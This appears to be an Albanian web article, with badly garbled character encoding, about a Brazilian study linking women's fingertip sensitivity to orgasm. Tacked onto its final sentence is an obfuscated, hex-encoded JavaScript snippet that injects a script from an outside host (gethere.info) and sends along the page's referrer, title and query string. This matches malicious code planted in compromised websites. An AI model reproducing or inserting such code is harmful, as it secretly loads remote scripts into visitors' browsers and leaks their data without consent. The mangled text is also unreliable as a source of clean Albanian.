f.1106233816434_m

KA�naqA�sia e njA� orgazme femA�rore fshihet nA� majat e gishtave tA� saj

NjA� studim i kryer nA� Brazil, vA�rteton se sa mA� delikate dhe tA� ndjeshA�m tA� jenA� majat e gishtave tA� femrA�s, aq mA� shumA� shtohen shanset e orgazmA�s dhe shijimit tA� saj gjatA� marrA�dhA�nies seksuale.

Prekja, A�shtA� njA� nga vetitA� mA� tA� fuqishme tA� kA�naqA�sisA� e cila lidhet direkt me marrA�dhA�nien seksualea�?, deklaroi Dr. Irwin Goldstein, kryeredaktor i revistA�s a�?The Journal of Sexual Medicinea�? dhe drejtor i klinikA�s sA� seksologjisA� nA� Alvarado Hospital tA� San Diego-s.

Ky studim vA�rteton se ndjeshmA�ria e dobA�t nA� kombinim me psikologji tA� keqe, mund tA� A�ojA� nA� (a�?fishkjena�?) demoralizimin e epshit seksual tA� njA� femre.

NA� kA�tA� studim morA�n pjesA� 70-tA� studentA� vullnetar, tA� cilA�t i pA�rkisnin grup moshA�s, nga 18 deri mA� 30-vjeA�. Femrat tA� cilat kishin ndjeshmA�ri (delikate) tA� theksuar nA� gishtat e tyre, kishin mA� shumA� shanse dhe arrinin mA� shpesh nA� orgazA�m gjatA� marrA�dhA�nies. Femrat me ndjeshmA�ri mA� tA� dobA�ta nA� gishtat e tyre (mundA�sia pA�r tA� ardhur mA� pranA� gjinisA� tjetA�r), ishin shumA� mA� tA� kufizuara dhe thuajse shanset pA�r tA� ardhur nA� orgazA�m gjatA� marrA�dhA�nies seksuale ishin thuajse tA� pakta.

Dr. Goldstein, tha gjithashtu se kA�naqA�sia seksuale A�shtA� vA�rtetuar se A�shtA� e njA� rA�ndA�sie tA� veA�antA� dhe jetike pA�r njA� jetA� sa mA� tA� shA�ndetshme nA� A�do pikA�pamje, sigurisht edhe atA� seksuale.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}